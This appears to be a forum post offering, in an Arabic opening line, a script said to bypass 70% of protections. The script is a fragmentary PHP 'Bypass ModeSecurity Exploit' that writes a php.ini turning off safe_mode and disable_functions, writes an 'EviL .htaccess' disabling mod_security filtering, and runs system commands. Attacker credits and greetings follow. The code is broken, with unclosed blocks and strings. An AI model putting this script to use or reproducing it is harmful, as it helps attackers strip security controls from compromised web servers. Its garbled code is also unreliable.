معي سكريبت يتخطى حماية 70%
Bypass ModeSecurity Exploit
echo "<b><font color='green'>[+] Start...<br>\n";
if($bypfile and $stuffile!= NULL){
echo "[+] Fucking Bypass Created Succes !<br> \n";
echo "<font color='red'>[-] access denial ! <br></font> \n";
$byprullz1="safe_mode = OFF
$byprullz2="disable_functions = NONE";
if($dj and $dj1!= NULL){
echo "[+] php.ini Writed ! <br>\n";
echo "<font color='red'>[-] 404 php.ini not found !<br></font> \n";
$breakrullz="Options Indexes FollowSymLinks
DirectoryIndex vbspiders.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>"; // xD
if($sf7!= NULL){
echo "<font color='green'>[+] EviL .htaccess Writing ....Done<br>\n";
echo "<font color='orange'>[+] Exploited Success!<br><br><br> \n\n\n";
echo "\t\t\t<font color='green'>[+] Edited By Aghilas -- Algeria <br>\n";
echo "\t\t\t<font color='green'>[+] Wr!ted By Hunter<br><br>\n";
echo "\t\t\t<font color='gray'> [+] somme errors was edited by aghilas <br>\n";
echo "\t\t\t<font color='blue'>[+] Greetz : ALL My Friends ...\n";
echo "<font color='red'>[-] Evil .htaccess Not FouNd!</font>\n";
system("uname -a;pwd");